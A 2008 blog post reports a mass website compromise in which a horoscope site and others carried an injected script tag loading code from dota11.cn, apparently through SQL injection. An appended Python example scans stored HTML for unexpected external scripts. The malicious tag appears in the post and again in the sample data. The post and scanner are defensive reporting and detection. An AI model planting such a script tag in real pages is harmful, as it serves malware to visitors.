Comet Blog
Ramblings of Comet--Berkeley

More Hacked in the Green Zone


Thursday, May 29, 2008   09:52:00 AM PDT


May 28, 8:47 AM PDT (GMT-7)
So-called "trusted" web sites are no longer trustworthy, as I reported in my earlier blog post:
Hacked in the Green Zone

The good news is that the San Francisco Chronicle reported on this on May 6, 2008:
Internet criminals gaining ground, experts say

The bad news is that I found a new problem, and I have not seen that anyone else has picked up on it.

Here is what I found. On the morning of Tuesday, May 27, 2008, the StarIQ.com Daily Horoscope was hacked. Embedded inside the description for each sign of the zodiac was a tag like this:

<script src=http://www.dota11.cn/m.js></script>

So if a Windows computer user clicked on his sign, he would download some spambot, virus, or who knows what from several web sites registered in China.

Essentially, the home computer is compromised and the hacker can do anything he likes with the machine.

Is StarIQ.com the only web site to have this problem?

Heck no. A Google search turns up over 200,000 hits.
Thousands of these websites are still infected!

Examples: (Don't go to these websites unless you are protected!)
 www.morrellwinebar.com
 www.bioimmune.com
 www.americancapitalrealty.net

How did this happen? I would like to know. Somehow hackers are compromising thousands of web sites like StarIQ.com and changing their web pages.

What can the average home computer user do? Use the Firefox web browser with the NoScript add-on.

Another option is to just not use Windows; use Linux instead.

Update May 29 9:53 AM PDT

I reported the problem to Google.com and they flagged dota11.cn as a "bad" website. So if you do a Google search and try to click on an infected website, then a warning page appears first.

The "cause" of the infection appears to be SQL injection into the Microsoft SQL Server, by supplying custom values in web form input: the same old web CGI, client-server problems that have been around for decades.

Here is a technical description of the problem:

www.0x000000.com
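As an added example (not from the original post or from any of the sites named above), here is the kind of check a site owner could run over stored page content, such as the horoscope description rows, to catch a tag like the one shown above: it parses each row, collects every script src (quoted or, as in the injected tag, unquoted), and flags any host that is not on the site's own allow-list. The allow-list and the sample rows are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately loads scripts from (constructed for this example).
ALLOWED_SCRIPT_HOSTS = {"www.stariq.com", "stariq.com"}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag, quoted or unquoted."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def find_injected_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return script URLs in `html` whose host is not on the allow-list.

    Relative paths (no host) are treated as the site's own scripts and skipped.
    """
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    suspicious = []
    for src in parser.srcs:
        # Prefix "//" so protocol-relative and bare paths parse consistently.
        host = urlparse(src if "//" in src else "//" + src).hostname
        if host and host.lower() not in allowed_hosts:
            suspicious.append(src)
    return suspicious


def scan_rows(rows, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Scan (row_id, html_text) pairs and return (row_id, src) findings."""
    return [(row_id, src) for row_id, text in rows
            for src in find_injected_scripts(text, allowed_hosts)]


# Constructed sample rows modelled on the post: one carries the injected tag.
SAMPLE_ROWS = [
    ("aries", "<p>Today brings new energy.</p><script src=http://www.dota11.cn/m.js></script>"),
    ("taurus", '<p>Take things slowly.</p><script src="/js/site.js"></script>'),
    ("gemini", "<p>Talk it out.</p>"),
]

if __name__ == "__main__":
    for row_id, src in scan_rows(SAMPLE_ROWS):
        print(f"row {row_id}: unexpected external script {src}")
```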
